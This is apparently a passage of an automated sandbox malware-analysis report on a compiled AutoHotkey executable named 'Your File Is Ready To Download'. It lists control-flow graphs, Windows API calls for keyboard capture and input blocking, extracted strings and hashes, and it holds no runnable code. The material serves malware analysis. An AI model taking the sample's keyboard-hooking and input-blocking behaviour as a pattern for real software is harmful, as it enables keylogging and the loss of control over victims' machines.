                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 3168 140016d90-140016dba 3169 140017375-140017383 3168->3169 3170 140016dc0-140016df6 GetCurrentThreadId 3168->3170 3171 140016e02 3170->3171 3172 140016df8-140016dfb 3170->3172 3174 140016e05-140016e13 3171->3174 3172->3171 3173 140016dfd-140016e00 3172->3173 3173->3174 3175 140016e15-140016e18 3174->3175 3176 140016e1a 3174->3176 3175->3176 3177 140016e21-140016e23 3175->3177 3176->3177 3178 140016e32-140016e35 3177->3178 3179 140016e25-140016e30 call 14001b130 3177->3179 3181 140016e44-140016e64 3178->3181 3182 140016e37-140016e41 call 14001adc0 3178->3182 3179->3181 3183 140016e66-140016e71 3181->3183 3184 140016e8b-140016e8e 3181->3184 3182->3181 3183->3184 3187 140016e73-140016e7c 3183->3187 3188 140016e94-140016ea4 call 140019cb0 3184->3188 3189 140016fbf-140016fd3 3184->3189 3187->3184 3200 140016eaa-140016eb8 GetKeyboardState 3188->3200 3201 140016f4b-140016f58 3188->3201 3192 140016fd5-140016fd8 3189->3192 3193 140016fff 3189->3193 3196 140016fe4-140016fe7 3192->3196 3197 140016fda-140016fdd 3192->3197 3194 140017004-14001701a 3193->3194 3198 14001701c-14001701f 3194->3198 3199 14001702f 3194->3199 3196->3193 3203 140016fe9-140016ffd BlockInput 3196->3203 3197->3196 3202 140016fdf-140016fe2 3197->3202 3198->3199 3206 140017021-140017029 3198->3206 3207 140017031-14001703d 3199->3207 3208 140016ec4-140016ec8 3200->3208 3209 140016eba-140016ec2 3200->3209 3204 140016f73-140016f7a 3201->3204 3205 140016f5a-140016f6d PostMessageW 3201->3205 3202->3193 3202->3196 3203->3194 3210 140016f96-140016f99 3204->3210 3211 140016f7c-140016f80 3204->3211 3205->3204 3206->3199 3212 14001702b-14001702d 3206->3212 3213 1400170a9-1400170ae 3207->3213 3214 14001703f-140017042 3207->3214 3215 140016ed2-140016edd 3208->3215 3216 140016eca-140016ecd 3208->3216 3209->3215 3221 140017334-140017353 3210->3221 3222 140016f9f-140016fba PostMessageW 3210->3222 3211->3210 3218 140016f82-140016f94 call 140018d70 3211->3218 3212->3207 3217 1400170b3-1400170c2 3213->3217 3219 140017052-140017072 GetForegroundWindow call 140019fb0 call 14001a180 3214->3219 3220 140017044-140017050 3214->3220 3223 140016f40-140016f45 SetKeyboardState 3215->3223 3224 140016edf-140016eef 3215->3224 3216->3215 3225 1400170c6-1400170cf 3217->3225 3218->3222 3228 140017076-14001707b 3219->3228 3220->3228 3221->3169 3226 140017355-140017363 3221->3226 3222->3221 3223->3201 3224->3223 3230 1400170d1-1400170ee call 140019cb0 3225->3230 3231 1400170f0-1400170f3 3225->3231 3232 140017365-14001736b 3226->3232 3233 14001736d 3226->3233 3236 140017084-1400170a7 GetAsyncKeyState 3228->3236 3237 14001707d-140017082 3228->3237 3240 1400170f8-1400170fb 3230->3240 3231->3240 3239 140017370 call 140018d70 3232->3239 3233->3239 3236->3225 3237->3217 3239->3169 3244 14001711e 3240->3244 3245 1400170fd-140017106 3240->3245 3248 140017123-140017127 3244->3248 3245->3244 3247 140017108-140017110 3245->3247 3249 140017112-140017115 3247->3249 3250 140017117-14001711c 3247->3250 3251 1400171fe 3248->3251 3252 14001712d-14001712f 3248->3252 3249->3244 3249->3250 3250->3248 3253 140017205-14001720c 3251->3253 3254 140017131-140017152 call 140018610 3252->3254 3255 140017157-140017161 3252->3255 3257 14001723e-140017241 3253->3257 3258 14001720e-140017212 3253->3258 3263 1400171e7-1400171ec 3254->3263 3259 140017163-140017172 3255->3259 3260 140017178-14001719c keybd_event 3255->3260 3265 140017247-140017255 3257->3265 3266 14001731b-140017320 3257->3266 3258->3257 3262 140017214-140017222 3258->3262 3259->3260 3260->3263 3264 14001719e-1400171aa 3260->3264 3268 140017231-14001723c call 140018d70 3262->3268 3269 140017224-14001722f call 140018d70 3262->3269 3263->3253 3274 1400171ee-1400171f7 call 140018f80 3263->3274 3270 1400171b9-1400171bc 3264->3270 3271 1400171ac-1400171b7 3264->3271 3272 140017272-140017275 3265->3272 3273 140017257-140017270 call 140018610 3265->3273 3266->3221 3267 140017322-14001732d BlockInput 3266->3267 3267->3221 3268->3265 3269->3265 3270->3263 3280 1400171be-1400171d6 GetAsyncKeyState 3270->3280 3278 1400171d9-1400171e3 call 14001a180 3271->3278 3275 140017277-140017286 3272->3275 3276 14001728c-1400172ac keybd_event 3272->3276 3283 1400172ee-1400172f3 3273->3283 3289 1400171fc 3274->3289 3275->3276 3276->3283 3284 1400172ae-1400172b4 3276->3284 3278->3263 3280->3278 3292 140017306-14001730b 3283->3292 3293 1400172f5-1400172fd 3283->3293 3290 1400172c1-1400172c4 3284->3290 3291 1400172b6-1400172bf 3284->3291 3289->3253 3290->3283 3296 1400172c6-1400172dd GetAsyncKeyState 3290->3296 3295 1400172e0-1400172ea call 14001a180 3291->3295 3292->3266 3298 14001730d-140017316 call 140018f80 3292->3298 3293->3292 3297 1400172ff 3293->3297 3295->3283 3296->3295 3297->3292 3298->3266
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2882836952-0
                                                                                                                                                                                                                          • Opcode ID: 96a4155cb18f3f6a531702b1eb1fe101c41b874fb96488ea354fdeb08c731c75
                                                                                                                                                                                                                          • Instruction ID: 410be6e667894e73ab9c31ba02c4562feb9337d3e33a916f1f0fa0808e7806b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96a4155cb18f3f6a531702b1eb1fe101c41b874fb96488ea354fdeb08c731c75
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6F1BF321182E08AF76B9B27A854BE97AE0F74D784F04011AFB860F6F5CB3AC845D710
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $ $ $Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 0-1407833225
                                                                                                                                                                                                                          • Opcode ID: 0b8026cdf4441d804882a3c705724b61925794d9f69e5253c88b6c50ec76ef2d
                                                                                                                                                                                                                          • Instruction ID: 392a286911dabb4b26674c938a50b86be6c95f22530fc16bd942bb73925f8073
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b8026cdf4441d804882a3c705724b61925794d9f69e5253c88b6c50ec76ef2d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C92DC72206A8485FB77DB23D5143E923A2AB4EBD4F594112FB4A0B6F5DB7EC885C340
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Parameter #2 invalid.$Parameter #3 invalid.$Read
                                                                                                                                                                                                                          • API String ID: 0-931347957
                                                                                                                                                                                                                          • Opcode ID: 634d79b4070bdce9f4028c6a36ffa6f95e5cf9bed3353b534fe5322752e76426
                                                                                                                                                                                                                          • Instruction ID: a2477e739225f8fd49c201b52a5afcaa81d6fe1effff83c8d5a0b9dd56a9c235
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 634d79b4070bdce9f4028c6a36ffa6f95e5cf9bed3353b534fe5322752e76426
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9223836A05B5085FB6B8B2BE8403EA77A1EB5CBD4F554126EF49476F9DB38C881C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 4407 14001f300-14001f32b call 1400c8f74 4410 14001f333-14001f387 call 1400c9bd0 SetTimer 4407->4410 4411 14001f32d-14001f332 4407->4411 4414 14001f397-14001f3c9 GetTickCount 4410->4414 4415 14001f389-14001f392 4410->4415 4417 14001f3f2-14001f427 GetTickCount call 140031f30 4414->4417 4418 14001f3cb-14001f3eb SetTimer 4414->4418 4416 14001f469-14001f477 4415->4416 4419 14001f479-14001f484 4416->4419 4420 14001f4be-14001f569 call 1400c9bd0 4416->4420 4425 14001f42c-14001f43c 4417->4425 4418->4417 4422 14001f486-14001f489 4419->4422 4423 14001f48f-14001f49d 4419->4423 4433 14001f58c-14001f5a1 4420->4433 4434 14001f56b-14001f587 call 1400afb50 4420->4434 4422->4423 4426 14001f4a4-14001f4b7 call 1400c9a08 4423->4426 4427 14001f49f call 1400c9a10 4423->4427 4429 14001f462 4425->4429 4430 14001f43e-14001f45c KillTimer 4425->4430 4426->4420 4427->4426 4429->4416 4430->4429 4435 14001f5a3-14001f5aa 4433->4435 4436 14001f5ac 4433->4436 4441 14001f7e7-14001f7fc 4434->4441 4439 14001f5af-14001f5ba 4435->4439 4436->4439 4442 14001f5cc-14001f5d6 4439->4442 4443 14001f5bc-14001f5c7 call 140005ff0 4439->4443 4444 14001f7fe-14001f805 4441->4444 4445 14001f83f-14001f851 4441->4445 4447 14001f5d8-14001f5dc 4442->4447 4448 14001f5fd-14001f601 4442->4448 4457 14001f7dd-14001f7e2 4443->4457 4444->4445 4449 14001f807-14001f80f 4444->4449 4447->4448 4451 14001f5de-14001f5f8 call 140040160 4447->4451 4452 14001f603-14001f612 call 1400b0200 4448->4452 4453 14001f617-14001f61d 4448->4453 4449->4445 4456 14001f811-14001f819 4449->4456 4451->4457 4452->4457 4454 14001f634-14001f644 4453->4454 4455 14001f61f-14001f62d 4453->4455 4460 14001f64a-14001f657 4454->4460 4461 14001f7b0-14001f7b7 4454->4461 4455->4454 4456->4445 4462 14001f81b-14001f822 4456->4462 4457->4441 4466 14001f659-14001f65b 4460->4466 4467 14001f66c-14001f674 4460->4467 4469 14001f7c6-14001f7d4 4461->4469 4470 14001f7b9-14001f7c1 call 1400c9bd0 4461->4470 4462->4445 4468 14001f824-14001f83a call 14001f8f0 4462->4468 4471 14001f6a9-14001f6ad 4466->4471 4472 14001f65d-14001f667 4466->4472 4467->4471 4474 14001f676-14001f67a 4467->4474 4468->4445 4476 14001f7d8 4469->4476 4470->4469 4477 14001f6b9-14001f6c1 4471->4477 4478 14001f6af-14001f6b4 4471->4478 4479 14001f7a4-14001f7ac 4472->4479 4480 14001f683-14001f68b 4474->4480 4481 14001f67c-14001f681 4474->4481 4476->4457 4482 14001f763-14001f76e 4477->4482 4483 14001f6c7-14001f6ce 4477->4483 4478->4482 4479->4461 4484 14001f68f-14001f69a call 1400a8e00 4480->4484 4481->4484 4485 14001f783 4482->4485 4486 14001f770-14001f773 4482->4486 4487 14001f6d0-14001f6dc 4483->4487 4488 14001f71f-14001f726 4483->4488 4484->4476 4504 14001f6a0-14001f6a4 4484->4504 4491 14001f786-14001f789 4485->4491 4486->4485 4490 14001f775-14001f781 call 1400c9a10 4486->4490 4492 14001f6e6-14001f6fc 4487->4492 4493 14001f6de 4487->4493 4494 14001f731-14001f738 4488->4494 4495 14001f728-14001f72f 4488->4495 4490->4491 4498 14001f852-14001f855 4491->4498 4499 14001f78f-14001f79a call 1400c8f74 4491->4499 4500 14001f715-14001f71d 4492->4500 4501 14001f6fe-14001f706 4492->4501 4493->4492 4502 14001f73a-14001f75a 4494->4502 4503 14001f75c 4494->4503 4495->4482 4508 14001f868-14001f86c 4498->4508 4509 14001f857-14001f866 4498->4509 4499->4498 4512 14001f7a0 4499->4512 4500->4482 4501->4500 4507 14001f708-14001f712 4501->4507 4502->4482 4503->4482 4504->4479 4507->4500 4511 14001f870-14001f88e call 140040160 4508->4511 4509->4511 4511->4476 4512->4479
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.LIBCMT ref: 000000014001F319
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8
                                                                                                                                                                                                                          • SetTimer.USER32 ref: 000000014001F377
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$AllocateHeapTimer_callnewhmalloc
                                                                                                                                                                                                                          • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 2580226803-457448710
                                                                                                                                                                                                                          • Opcode ID: 3fa2bfebcbc7caa754ae9a1d361acf40a61b4d2ef6fed00823556ee96360772d
                                                                                                                                                                                                                          • Instruction ID: 95d8417c0f1a8f382a4ee89a57459bb809ef3516b214311edc1b132613c27b08
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fa2bfebcbc7caa754ae9a1d361acf40a61b4d2ef6fed00823556ee96360772d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECF18C72204B8086FB569F22E4403E977A1F74CFD8F544526EB4A0B7B9CB3AC891E750
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindResourceW.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 00000001400203FB
                                                                                                                                                                                                                          • FindResourceW.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 0000000140020417
                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 000000014002042E
                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 0000000140020441
                                                                                                                                                                                                                          • LockResource.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 000000014002044F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$Find$LoadLockSizeof
                                                                                                                                                                                                                          • String ID: >AHK WITH ICON<$>AUTOHOTKEY SCRIPT<$Could not extract script from EXE.
                                                                                                                                                                                                                          • API String ID: 3127896203-4021547232
                                                                                                                                                                                                                          • Opcode ID: d6fe7a2ab9bb4bfceaf3d131b03556d622f3d43d352a62f836d4007b1b73634c
                                                                                                                                                                                                                          • Instruction ID: 4fa9915d770383e3ceba3c12ba8dbc7288b81bbf8e3835f789446a28df0f8c3f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6fe7a2ab9bb4bfceaf3d131b03556d622f3d43d352a62f836d4007b1b73634c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A317A71205B8085EB56AB27B8447DA77A4FB4CBD4F08812AAF4A07779DF3CC405CB00
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$CurrentDirectoryFileSystemmalloc
                                                                                                                                                                                                                          • String ID: ErrorLevel$Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 2763818370-844184505
                                                                                                                                                                                                                          • Opcode ID: 548aa7f14d302ff422d655c16b8db8386737a864009c306ac2adbd5a4fcc8351
                                                                                                                                                                                                                          • Instruction ID: cea454d1ff267d8dddfd5f0971b3fb9f029145ac597c90deb180777b750286b5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 548aa7f14d302ff422d655c16b8db8386737a864009c306ac2adbd5a4fcc8351
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65F1BC32200B4081EB669B26E4543E973A1F74DBD8F54452AEF5E1B7BADF78C895C340
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: f938fad744871b925cb9a191ea58e040de784671d9ef9e0d9aa366a0406ed2f4
                                                                                                                                                                                                                          • Instruction ID: 0e99c94694e932e4123b4f8210515a5043a547bae0ef887c7790616cbfc6cfa9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f938fad744871b925cb9a191ea58e040de784671d9ef9e0d9aa366a0406ed2f4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AF1A032A0464086FBBB8B67A4403EB67A2E79DBD4F554116FF494BAF5DB38D881C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 385c99a52f82c787db7813f651a90a7f7685052b680eee4af3a8da334d0f30db
                                                                                                                                                                                                                          • Instruction ID: 25eac62d4e5dfc700f62f9333028012030fd2ea95af16ad25bb177c0525f92cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 385c99a52f82c787db7813f651a90a7f7685052b680eee4af3a8da334d0f30db
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F1B132A0464086FBAB8B67A4403EF67A2E79DBD4F554116FF494BAF5DB38D881C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CurrentDestroyDirectoryIconNotifyShell_wcsncpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1905601840-0
                                                                                                                                                                                                                          • Opcode ID: 0828e0cdea0aa086c42065aae2b1be0df3b16609e3b026a98827852c9fc181e8
                                                                                                                                                                                                                          • Instruction ID: eba815331304d250c1791937e5f23ef74a7a0522d19da92e9b23fa157bab9115
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0828e0cdea0aa086c42065aae2b1be0df3b16609e3b026a98827852c9fc181e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FB19B72604B8486E726DB26E4903E977A0F78CB88F580116EB8E0B7B6CB7AC455D700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
